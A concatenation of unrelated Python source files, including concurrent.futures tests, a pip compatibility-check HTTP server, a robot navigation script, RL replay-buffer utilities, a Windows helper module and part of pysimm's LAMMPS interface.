self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError,
f1.result, timeout=support.SHORT_TIMEOUT)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=support.SHORT_TIMEOUT), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
def setUpModule():
unittest.addModuleCleanup(multiprocessing.util._cleanup_tests)
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
|
compatibility_checker_server.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A HTTP server that wraps pip_checker.
Requires Python 3.6 or later.
Example usage:
$ python3 compatibility_checker_server.py \
--host=0.0.0.0 --port=8888 \
--python-version \
2:python2,3:python3
$ curl 'http://0.0.0.0:8888/?package=six&python-version=3' \
| python3 -m json.tool
{
"result": "SUCCESS",
"packages": [
"six"
],
"description": null,
"requirements": "absl-py==0.2.2\napparmor==2.11.1\n..."
}
For complete usage information:
$ python3 compatibility_checker_server.py --help
"""
import argparse
import collections.abc
import json
import logging
import pprint
import threading
import typing
import urllib.parse
import wsgiref.simple_server
import pip_checker
def _parse_python_version_to_interpreter_mapping(s):
version_to_interpreter = {}
for version_mapping in s.split(','):
try:
version, command = version_mapping.split(':')
except ValueError:
raise argparse.ArgumentTypeError(
('{0} is not in the format of <version>:<command>,' +
'<version>:<command>').format(s))
version_to_interpreter[version] = command
return version_to_interpreter
class CompatibilityServer:
def __init__(self, host: str, port: int, clean: bool,
python_version_to_interpreter: typing.Mapping[str, str],
install_once: bool):
"""Initialize an HTTP server that checks for pip package compatibility.
Args:
host: The host name to listen on e.g. "localhost".
port: The port number to listen on e.g. 80.
clean: If True then uninstall previously installed packages before
handling each request.
python_version_to_interpreter: Maps python version e.g. "3" to
a Python interpreter that can corresponds to that version e.g.
"/usr/bin/python3.6"
install_once: If True then the server will exit after handling a
single request that involves installing pip packages.
"""
self._host = host
self._port = port
self._clean = clean
self._python_version_to_interpreter = python_version_to_interpreter
self._install_once = install_once
def _shutdown(self):
threading.Thread(target=self._httpd.shutdown).start()
def _check(self, start_response, python_version, packages):
if not packages:
start_response('400 Bad Request',
[('Content-Type', 'text/plain; charset=utf-8')])
return [b'Request must specify at least one package']
if not python_version:
start_response('400 Bad Request',
[('Content-Type', 'text/plain; charset=utf-8')])
return [b'Request must specify the Python version to use']
if python_version not in self._python_version_to_interpreter:
start_response('400 Bad Request',
[('Content-Type', 'text/plain; charset=utf-8')])
return [
b'Invalid Python version specified. Must be one of: %s' % (
', '.join(
self._python_version_to_interpreter).encode('utf-8'))
]
python_command = self._python_version_to_interpreter[python_version]
if self._install_once:
self._shutdown()
try:
pip_result = pip_checker.check(
[python_command, '-m', 'pip'], packages, clean=self._clean)
except pip_checker.PipError as pip_error:
start_response('500 Internal Server Error',
[('Content-Type', 'text/plain; charset=utf-8')])
with open(pip_error.stderr_path, 'r') as f:
error_text = f.read()
logging.error('pip command ("%s") failed with:\n%s\n',
pip_error.command_string, error_text)
return [
b'pip command ("%s") ' % pip_error.command_string.encode(
'utf-8'),
b'failed with:\n',
error_text.encode('utf-8'), b'\n'
]
results = dict(
result=pip_result.result_type.name,
packages=pip_result.packages,
description=pip_result.result_text,
dependency_info=pip_result.dependency_info)
start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(results).encode('utf-8')]
def _wsgi_app(self, environ, start_response):
if environ.get('REQUEST_METHOD') == 'GET':
parameters = urllib.parse.parse_qs(environ.get('QUERY_STRING', ''))
packages = parameters.get('package', [])
python_version = parameters.get('python-version', [None])[0]
elif environ.get('REQUEST_METHOD') == 'POST':
content_length = int(environ.get('CONTENT_LENGTH', 0))
try:
request = json.loads(
environ['wsgi.input'].read(content_length))
except json.JSONDecodeError as e:
start_response('400 Bad Request',
[('Content-Type', 'text/plain; charset=utf-8')])
return [b'Invalid JSON payload: ', str(e).encode('utf-8')]
if not isinstance(request, collections.abc.Mapping):
start_response('400 Bad Request',
[('Content-Type', 'text/plain; charset=utf-8')])
return [b'Request must contain a JSON object.']
packages = request.get('packages', [])
python_version = request.get('python-version', None)
else:
start_response('405 Method Not Allowed',
[('Content-Type', 'text/plain; charset=utf-8'),
('Allow', 'GET, POST')])
return [
b'Method %s not supported' %
environ.get('REQUEST_METHOD').encode('utf-8')
]
return self._check(start_response, python_version,
packages)
def serve(self):
with wsgiref.simple_server.make_server(self._host, self._port,
self._wsgi_app) as self._httpd:
self._httpd.serve_forever()
def main():
logging.basicConfig(
level=logging.INFO,
format='%(levelname)-8s %(asctime)s ' +
'%(filename)s:%(lineno)s] %(message)s')
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument(
'--host',
default='0.0.0.0',
help='host name to which the server should bind')
parser.add_argument(
'--port',
type=int,
default=8888,
help='port to which the server should bind')
parser.add_argument(
'--clean',
action='store_true',
help='uninstall existing packages before performing dependency ' +
'checking')
parser.add_argument(
'--install-once',
action='store_true',
help='exit after doing a single "pip install" command')
parser.add_argument(
'--python-versions',
type=_parse_python_version_to_interpreter_mapping,
default='2:python2,3:python3',
help='maps version strings to the Python command to execute when ' +
'running that version e.g. "2:python2;2,3:python3;' +
'3.5:/usr/bin/python3.5;3.6:/usr/bin/python3.6"')
args = parser.parse_args()
logging.info('Running server with:\n%s', pprint.pformat(vars(args)))
CompatibilityServer(args.host, args.port, args.clean, args.python_versions,
args.install_once).serve()
if __name__ == '__main__':
main()
|
env_test.py | from gibson2.envs.locomotor_env import NavigateRandomEnv, HotspotTravEnv
from time import time, sleep
import numpy as np
import gibson2
import os
from gibson2.core.render.profiler import Profiler
import logging
import math
import cv2 as cv
import threading
from gibson2.utils.utils import quatToXYZW, quatFromXYZW
from transforms3d.euler import euler2quat, quat2euler, euler2axangle, axangle2euler
from transforms3d.quaternions import quat2mat, axangle2quat
import io
import json
from scipy.interpolate import splev, splprep, Rbf, InterpolatedUnivariateSpline, CubicSpline, interp1d
from CatmullRomSpline import CatmullRomChain, RecursiveCatmullRomChain
from geomdl import BSpline, fitting
logging.getLogger().setLevel(logging.DEBUG) #To increase the level of logging
def smooth_filter(p_x, p_y):
size = 2 # filter range
x = []
y = []
for i in range(size):
x.append(p_x[i])
y.append(p_y[i])
for i in range(size, len(p_x) - size, 1):
new_x = 0
new_y = 0
for j in range(size * 2 + 1):
idx = j - size
new_x += p_x[i + idx]
new_y += p_y[i + idx]
new_x /= (size * 2 + 1)
new_y /= (size * 2 + 1)
x.append(new_x)
y.append(new_y)
for i in range(size):
idx = i - size
x.append(p_x[idx])
y.append(p_y[idx])
return np.array(x), np.array(y)
def main():
global recording
global nav_env
config_filename = os.path.join(os.path.dirname(gibson2.__file__),
'../examples/configs/turtlebot_demo.yaml')
nav_env = HotspotTravEnv(config_file=config_filename, mode='gui')
for j in range(20):
nav_env.reset()
path, dist = nav_env.get_shortest_path(entire_path=True)
print(dist)
p_x = path[:, 0]
p_y = path[:, 1]
p_t = np.arange(len(p_x))
c = CatmullRomChain(path)
s_x, s_y = zip(*c)
# tck_x, u_x = splprep([p_t, p_x], k=5)
# tck_y, u_y = splprep([p_t, p_y], k=5)
# u = np.linspace(0, 1, 100)
# _, s_x = np.array(splev(u, tck_x))
# _, s_y = np.array(splev(u, tck_y))
# rbf_x = Rbf(p_t, p_x)
# rbf_y = Rbf(p_t, p_y)
# u = np.linspace(0, len(p_t), 99)
# s_x = rbf_x(u)
# s_y = rbf_y(u)
# ius_x = InterpolatedUnivariateSpline(p_t, p_x)
# ius_y = InterpolatedUnivariateSpline(p_t, p_y)
# u = np.linspace(0, len(p_t), 99)
# s_x = ius_x(u)
# s_y = ius_y(u)
f_x = interp1d(p_t, p_x)
f_y = interp1d(p_t, p_y)
_u = np.linspace(0, p_t[-1], len(p_t) * 1)
# _p_x, _p_y = smooth_filter(f_x(_u), f_y(_u))
_p_x, _p_y = smooth_filter(np.array(s_x), np.array(s_y))
_p_t = np.arange(len(_p_x))
cs_x = CubicSpline(_p_t, _p_x)
cs_y = CubicSpline(_p_t, _p_y)
u = np.linspace(0, _p_t[-1], int(dist * 30))
s_x = cs_x(u)
s_y = cs_y(u)
# crv = fitting.interpolate_curve(path.tolist(), 5)
# u = np.linspace(0, 1, 100)
# pts = np.array(crv.evaluate_list(u))
# s_x = pts[:, 0]
# s_y = pts[:, 1]
nav_env.step_visualization(np.array([[s_x[p], s_y[p]] for p in range(len(s_x))]))
recording = True
# threading.Thread(target=recorder_core, args=(os.path.join(os.path.dirname(gibson2.__file__), '../examples/captures', 'bs'+str(j) + '.avi'),)).start()
# save_path(str(j) + '.json', path.tolist())
for i in range(len(s_x)):
# with Profiler('Environment action step'):
pos = nav_env.get_position_of_interest()
next_pos = [s_x[i], s_y[i], pos[2]]
next_dir = np.array([next_pos[0] - pos[0], next_pos[1] - pos[1]])
# print(next_pos)
orn = nav_env.get_orientation()
next_orn = new_orientation_from_dir(orn, next_dir)
state, reward, done, info = nav_env.step((next_pos, next_orn))
# sleep(1)
if i == len(s_x) - 1:
logging.info("Episode finished after {} timesteps".format(i + 1))
break
recording = False
def save_path(filePath, data):
with open(filePath, 'w') as outfile:
json.dump(data, outfile)
def normalize(vec):
return vec / np.linalg.norm(vec)
def new_orientation_from_dir(orn, next_dir):
initial_dir = np.array([1, 0])
cos = np.dot(initial_dir, normalize(next_dir))
sin = np.cross(initial_dir, normalize(next_dir))
rad = np.arccos(cos)
if sin < 0:
rad = -rad
# print(rad)
next_orn = quatToXYZW(axangle2quat(np.array([0, 0, 1]), rad, is_normalized=True), 'wxyz')
return next_orn
def get_frame():
return (nav_env.simulator.viewer.frame * 255).astype(np.uint8)
def get_clipped(frame):
return get_frame()[:256, :]
def recorder_core(filename):
res = (512, 512)
fps = 20.0
# DIVX(.avi) / XVID
fourcc = cv.VideoWriter_fourcc(*'DIVX')
out = cv.VideoWriter(filename, fourcc, fps, res)
while(recording):
frame = get_frame()
out.write(frame)
sleep(1 / fps)
out.release()
if __name__ == "__main__":
main()
|
utils.py | import torch
import numpy as np
import torch.nn as nn
import gym
import os
from collections import deque
import random
import copy
import skimage
import torch.multiprocessing as mp
class eval_mode(object):
def __init__(self, *models):
self.models = models
def __enter__(self):
self.prev_states = []
for model in self.models:
self.prev_states.append(model.training)
model.train(False)
def __exit__(self, *args):
for model, state in zip(self.models, self.prev_states):
model.train(state)
return False
def soft_update_params(net, target_net, tau):
for param, target_param in zip(net.parameters(), target_net.parameters()):
target_param.data.copy_(
tau * param.data + (1 - tau) * target_param.data
)
def set_seed_everywhere(seed):
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
def module_hash(module):
result = 0
for tensor in module.state_dict().values():
result += tensor.sum().item()
return result
def make_dir(dir_path):
try:
os.mkdir(dir_path)
except OSError:
pass
return dir_path
def preprocess_obs(obs, bits=5):
"""Preprocessing image, see https://arxiv.org/abs/1807.03039."""
bins = 2**bits
assert obs.dtype == torch.float32
if bits < 8:
obs = torch.floor(obs / 2**(8 - bits))
obs = obs / bins
obs = obs + torch.rand_like(obs) / bins
obs = obs - 0.5
return obs
def random_augment(obses, rad_height, rad_width):
n, c, h, w = obses.shape
_h = h - 2 * rad_height
_w = w - 2 * rad_width
w1 = torch.randint(0, rad_width + 1, (n,))
h1 = torch.randint(0, rad_height + 1, (n,))
cropped_obses = torch.empty((n, c, _h, _w), device=obses.device).float()
for i, (obs, w11, h11) in enumerate(zip(obses, w1, h1)):
cropped_obses[i][:] = obs[:, h11:h11 + _h, w11:w11 + _w]
return cropped_obses
def evaluate(env, agent, num_episodes, L, step, args):
for i in range(num_episodes):
obs = env.reset()
#video.init(enabled=(i == 0))
done = False
episode_reward = 0
while not done:
with eval_mode(agent):
obs = obs[:, args.rad_offset: args.image_size + args.rad_offset, args.rad_offset: args.image_size + args.rad_offset]
action = agent.select_action(obs)
obs, reward, done, _ = env.step(action)
#video.record(env)
episode_reward += reward
#video.save('%d.mp4' % step)
L.log('eval/episode_reward', episode_reward, step)
L.dump(step)
class BufferQueue(object):
"""Queue to transfer arbitrary number of data between processes"""
def __init__(self, num_items, max_size=10, start_method='spawn'):
self.max_size = max_size
ctx = mp.get_context(start_method)
self.queues = [ctx.Queue(max_size) for _ in range(num_items)]
def put(self, *items):
for queue, item in zip(self.queues, items):
queue.put(item)
def get(self):
return [queue.get() for queue in self.queues]
class RadReplayBuffer(object):
"""Buffer to store environment transitions."""
def __init__(self, obs_shape, state_shape, action_shape, capacity, batch_size, rad_offset, device):
self.capacity = capacity
self.batch_size = batch_size
self.device = device
# the proprioceptive obs is stored as float32, pixels obs as uint8
#obs_dtype = np.float32 if len(obs_shape) == 1 else np.uint8
self.ignore_obs = True
self.ignore_state = True
if obs_shape[-1] != 0:
self.obses = np.empty((capacity, *obs_shape), dtype=np.uint8)
self.next_obses = np.empty((capacity, *obs_shape), dtype=np.uint8)
self.ignore_obs = False
self.rad_h = round(rad_offset * obs_shape[1])
self.rad_w = round(rad_offset * obs_shape[2])
if state_shape[-1] != 0:
self.states = np.empty((capacity, *state_shape), dtype=np.float32)
self.next_states = np.empty((capacity, *state_shape), dtype=np.float32)
self.ignore_state = False
self.actions = np.empty((capacity, *action_shape), dtype=np.float32)
self.rewards = np.empty((capacity, 1), dtype=np.float32)
self.not_dones = np.empty((capacity, 1), dtype=np.float32)
self.idx = 0
self.last_save = 0
self.full = False
def add(self, obs, state, action, reward, next_obs, next_state, done):
if not self.ignore_obs:
self.obses[self.idx] = obs
self.next_obses[self.idx] = next_obs
if not self.ignore_state:
self.states[self.idx]= state
self.next_states[self.idx]= next_state
self.actions[self.idx]= action
self.rewards[self.idx]= reward
self.not_dones[self.idx]= not done
self.idx = (self.idx + 1) % self.capacity
self.full = self.full or self.idx == 0
def sample(self):
idxs = np.random.randint(
0, self.capacity if self.full else self.idx, size=self.batch_size
)
if self.ignore_obs:
obses = None
next_obses = None
else:
obses = torch.as_tensor(self.obses[idxs], device=self.device).float()
next_obses = torch.as_tensor(self.next_obses[idxs], device=self.device).float()
obses = random_augment(obses, self.rad_h, self.rad_w)
next_obses = random_augment(next_obses, self.rad_h, self.rad_w)
if self.ignore_state:
states = None
next_states = None
else:
states = torch.as_tensor(self.states[idxs], device=self.device).float()
next_states = torch.as_tensor(self.next_states[idxs], device=self.device).float()
actions = torch.as_tensor(self.actions[idxs], device=self.device)
rewards = torch.as_tensor(self.rewards[idxs], device=self.device)
not_dones = torch.as_tensor(self.not_dones[idxs], device=self.device)
return obses, states, actions, rewards, next_obses, next_states, not_dones
import time
import threading
import cv2 as cv
class AsyncRadReplayBuffer(RadReplayBuffer):
def __init__(self, obs_shape, state_shape, action_shape, capacity, batch_size, rad_offset,
device, input_queue, output_queue, init_step, max_update_freq, sync_queue):
super(AsyncRadReplayBuffer, self).__init__(obs_shape, state_shape, action_shape, capacity, batch_size,
rad_offset, device)
self.init_step = init_step
self._step = 0
self._send_counter = 0
self._max_update_freq = max_update_freq
self.input_queue = input_queue
self.output_queue = output_queue
self.sync_queue = sync_queue
self.start_thread()
def start_thread(self):
threading.Thread(target=self.recv_from_env).start()
threading.Thread(target=self.send_to_update).start()
def recv_from_env(self):
while True:
self.add(*self.input_queue.get())
self._step += 1
def send_to_update(self):
while True:
if self._send_counter > (self._step - self.init_step) * self._max_update_freq:
time.sleep(0.1)
else:
if self.sync_queue is not None:
self.sync_queue.get()
self.output_queue.put(tuple(self.sample()))
self._send_counter += 1
def save(self, save_dir):
if self.idx == self.last_save:
return
path = os.path.join(save_dir, '%d_%d.pt' % (self.last_save, self.idx))
payload = [
self.obses[self.last_save:self.idx],
self.states[self.last_save:self.idx],
self.next_obses[self.last_save:self.idx],
self.next_states[self.last_save:self.idx],
self.actions[self.last_save:self.idx],
self.rewards[self.last_save:self.idx],
self.not_dones[self.last_save:self.idx]
]
self.last_save = self.idx
torch.save(payload, path)
def load(self, save_dir):
chunks = os.listdir(save_dir)
chucks = sorted(chunks, key=lambda x: int(x.split('_')[0]))
for chunk in chucks:
start, end = [int(x) for x in chunk.split('.')[0].split('_')]
path = os.path.join(save_dir, chunk)
payload = torch.load(path)
assert self.idx == start
self.obses[start:end] = payload[0]
self.states[start:end] = payload[1]
self.next_obses[start:end] = payload[2]
self.next_states[start:end] = payload[3]
self.actions[start:end] = payload[4]
self.rewards[start:end] = payload[5]
self.not_dones[start:end] = payload[6]
self.idx = end
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
gym.Wrapper.__init__(self, env)
self._k = k
self._frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=1,
shape=((shp[0] * k,) + shp[1:]),
dtype=env.observation_space.dtype
)
self._max_episode_steps = env._max_episode_steps
def reset(self):
obs = self.env.reset()
for _ in range(self._k):
self._frames.append(obs)
return self._get_obs()
def step(self, action):
obs, reward, done, info = self.env.step(action)
self._frames.append(obs)
return self._get_obs(), reward, done, info
def _get_obs(self):
assert len(self._frames) == self._k
return np.concatenate(list(self._frames), axis=0)
|
utils.py | import os
import sys
import time
import struct
import zipfile
import threading
import subprocess
import requests
from requests import exceptions
# Import win32api
import win32api
import win32gui, win32con
'''
Support :
chlocal 选择当前脚本所在目录
无参数
str2hex 将字符串转换为二进制
需要字符串参数
symlink 生成一个cygwin可以识别的软连接
第一个参数是链接目标 第二个参数是生成文件
mkdir 新建一个文件夹
需要文件夹路径
rmdir 递归删除一个文件夹
需要文件夹路径
hideDosConsole(title)
根据标题隐藏控制台
showDosConsole(title)
根据标题显示控制台
hideForegroundWindow
隐藏最顶层控制台
addExecPath(addpath)
在PATH路径增加一个目录
get_time()
返回当前时间
listdir(path,ext)
path 路径
ext 文件扩展名
runcmd(cmd)
运行系统中的命令,不支持中文返回
getShiju()
获取诗句
'''
def chLocal():
os.chdir(os.path.abspath(os.path.dirname(sys.argv[0])))
def str2hex(string):
by = bytes(string,'UTF-8')
hexstring = by.hex()
return hexstring
def hexStringTobytes(str):
str = str.replace(" ", "")
return bytes.fromhex(str)
# return a2b_hex(str)
def bytesToHexString(bs):
# hex_str = ''
# for item in bs:
# hex_str += str(hex(item))[2:].zfill(2).upper() + " "
# return hex_str
return ''.join(['%02X' % b for b in bs])
def symlink(target, file): # 创建一个cygwin可以读取的软连接
f = open(file, "wb")
magic = b'!<symlink>'
for i in magic:
s = struct.pack('B', i)
f.write(s)
f.write(b'\xff\xfe')
for i in bytes(target, encoding="ASCII"):
s = struct.pack('B', i)
f.write(s)
f.write(b'\x00')
f.write(b'\x00\x00')
f.close()
win32api.SetFileAttributes(file, win32con.FILE_ATTRIBUTE_SYSTEM) # 设置sys属性
def mkdir(path):
folder = os.path.exists(path)
if not folder: #判断是否存在文件夹如果不存在则创建为文件夹
os.makedirs(path) #makedirs 创建文件时如果路径不存在会创建这个路径
else:
return False
def hideDosConsole(title):
# the_program_to_hide = win32gui.GetForegroundWindow() # 寻找前置窗口
FrameClass = 'ConsoleWindowClass'
FrameTitle = title
the_program_to_hide = win32gui.FindWindow(FrameClass, FrameTitle)
win32gui.ShowWindow(the_program_to_hide, win32con.SW_HIDE) #隐藏窗口
def showDosConsole(title):
# the_program_to_hide = win32gui.GetForegroundWindow() # 寻找前置窗口
FrameClass = 'ConsoleWindowClass'
FrameTitle = title
the_program_to_hide = win32gui.FindWindow(FrameClass, FrameTitle)
win32gui.ShowWindow(the_program_to_hide, win32con.SW_SHOW) #隐藏窗口
def hideForegroundWindow():
the_program_to_hide = win32gui.GetForegroundWindow()
win32gui.ShowWindow(the_program_to_hide, win32con.SW_HIDE) #隐藏窗口
def addExecPath(addpath):
envpath = os.getenv('PATH')
execpath = os.path.abspath(addpath)
os.putenv('PATH', execpath+";"+envpath)
def get_time(): # 返回当前时间
time1 = ''
time2 = time.strftime('%H:%M:%S')
if time2 != time1:
time1 = time2
return time1
def thrun(fun): # 调用子线程跑功能,防止卡住
# showinfo("Test threading...")
th=threading.Thread(target=fun)
th.setDaemon(True)
th.start()
def listfile(path,ext):
L=[]
for root, dirs, files in os.walk(path):
for file in files:
if os.path.splitext(file)[1] == ext:
tmp = os.path.join(root, file)
L.append(tmp)
return L
def listDirHeader(path,head):
L=[]
for i in os.listdir(path):
if(i.startswith(head)):
L.append(i)
return L
def unzip_file(zip_src, dst_dir):
r = zipfile.is_zipfile(zip_src)
if r:
fz = zipfile.ZipFile(zip_src, 'r')
for file in fz.namelist():
fz.extract(file, dst_dir)
else:
print('This is not zip')
def zip_file(file, dst_dir):
def get_all_file_paths(directory):
# 初始化文件路径列表
file_paths = []
for root, directories, files in os.walk(directory):
for filename in files:
#连接字符串形成完整的路径
filepath = os.path.join(root, filename)
file_paths.append(filepath)
# 返回所有文件路径
return file_paths
#假设要把一个叫testdir中的文件全部添加到压缩包里(这里只添加一级子目录中的文件)
path = os.getcwd()
relpath = os.path.abspath(file)
os.chdir(dst_dir)
file_paths = get_all_file_paths('.')
# compression
# 生成压缩文件
with zipfile.ZipFile(relpath, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=True) as zip:
#遍历写入文件
for file in file_paths:
zip.write(file)
os.chdir(path)
def test():
print("test")
def getShiju():
url = "https://v1.jinrishici.com/all"
bypass_systemProxy = { "http" : None,
"https" : None}
r = requests.get(url, proxies=bypass_systemProxy)
rjason = r.json()
return rjason
def getOnlineVersion():
bypass_systemProxy = { "http" : None,
"https" : None}
url = "https://ghproxy.com/https://raw.githubusercontent.com/affggh/NH4RomTool/master/version.txt"
r = requests.get(url, proxies=bypass_systemProxy)
return r.text
def getCurrentVersion():
file = open("version.txt", "r")
content = file.read()
file.close()
return content
def getdirsize(dir):
size = 0
for root, dirs, files in os.walk(dir):
size += sum([os.path.getsize(os.path.join(root, name)) for name in files])
return size
print("Load utils...") |
lmps.py | # ******************************************************************************
# pysimm.lmps module
# ******************************************************************************
#
# ******************************************************************************
# License
# ******************************************************************************
# The MIT License (MIT)
#
# Copyright (c) 2016 Michael E. Fortunato, Coray M. Colina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import shlex
import shutil
from subprocess import call, Popen, PIPE
from queue import Queue, Empty
from threading import Thread
import os
import sys
import json
from random import randint
from time import strftime
from io import StringIO
try:
import pandas as pd
except ImportError:
pd = None
from pysimm.system import read_lammps
from pysimm.system import System
from pysimm import error_print
from pysimm import warning_print
from pysimm import verbose_print
from pysimm import debug_print
from pysimm.utils import PysimmError, Item, ItemContainer
try:
from Rappture.tools import getCommandOutput as RapptureExec
except ImportError:
pass
LAMMPS_EXEC = os.environ.get('LAMMPS_EXEC')
verbose = False
templates = {}
FF_SETTINGS = {
'dreiding':
{
'pair_style': 'lj/cut',
'bond_style': 'harmonic',
'angle_style': 'harmonic',
'dihedral_style': 'harmonic',
'improper_style': 'umbrella',
'pair_modify': {
'mix': 'arithmetic'
},
'special_bonds': 'dreiding'
},
'amber':
{
'pair_style': 'lj/cut',
'bond_style': 'harmonic',
'angle_style': 'harmonic',
'dihedral_style': 'fourier',
'improper_style': 'cvff',
'pair_modify': {
'mix': 'arithmetic'
},
'special_bonds': 'amber'
},
'tip3p':
{
'pair_style': 'lj/cut',
'bond_style': 'harmonic',
'angle_style': 'harmonic',
'dihedral_style': 'fourier',
'improper_style': 'cvff',
'pair_modify': {
'mix': 'arithmetic'
},
'special_bonds': 'amber'
},
'pcff':
{
'pair_style': 'lj/class2',
'bond_style': 'class2',
'angle_style': 'class2',
'dihedral_style': 'class2',
'improper_style': 'class2',
'pair_modify': {
'mix': 'sixthpower'
},
'special_bonds': 'lj/coul 0 0 1'
},
'opls':
{
'pair_style': 'lj/cut',
'bond_style': 'harmonic',
'angle_style': 'harmonic',
'dihedral_style': 'opls',
'improper_style': 'cvff',
'pair_modify': {
'mix': 'geometric'
},
'special_bonds': 'lj/coul 0 0 0.5'
},
'charmm':
{
'pair_style': 'lj/charmm',
'bond_style': 'harmonic',
'angle_style': 'charmm',
'dihedral_style': 'charmm',
'improper_style': 'harmonic',
'pair_modify': {
'mix': 'arithmetic'
},
'special_bonds': 'charmm'
},
'trappe/amber':
{
'pair_style': 'lj/cut',
'bond_style': 'harmonic',
'angle_style': 'harmonic',
'dihedral_style': 'fourier',
'improper_style': 'cvff',
'pair_modify': {
'mix': 'arithmetic'
},
'special_bonds': 'amber'
}
}
def check_lmps_exec():
if LAMMPS_EXEC is None:
print('you must set environment variable LAMMPS_EXEC')
return False
else:
try:
stdout, stderr = Popen([LAMMPS_EXEC, '-e', 'both', '-l', 'none'],
stdin=PIPE, stdout=PIPE,
stderr=PIPE).communicate()
if verbose:
print('using %s LAMMPS machine' % LAMMPS_EXEC)
return True
except OSError:
print('LAMMPS is not configured properly for one reason or another')
return False
class Init(object):
"""pysimm.lmps.Init
Template object to contain LAMMPS initialization settings
Attributes:
forcefield: name of a supported force field; simulation settings will be chosen based on the force field name
units: LAMMPS set of units to use during simulation; default=real
atom_style: LAMMPS aomt_style to use during simulation; default=full
charge: option to define if any particles in system a non-zero charge
kspace_style: LAMMPS kspace_style to use during simulation if system has charges; default=pppm 1e-4
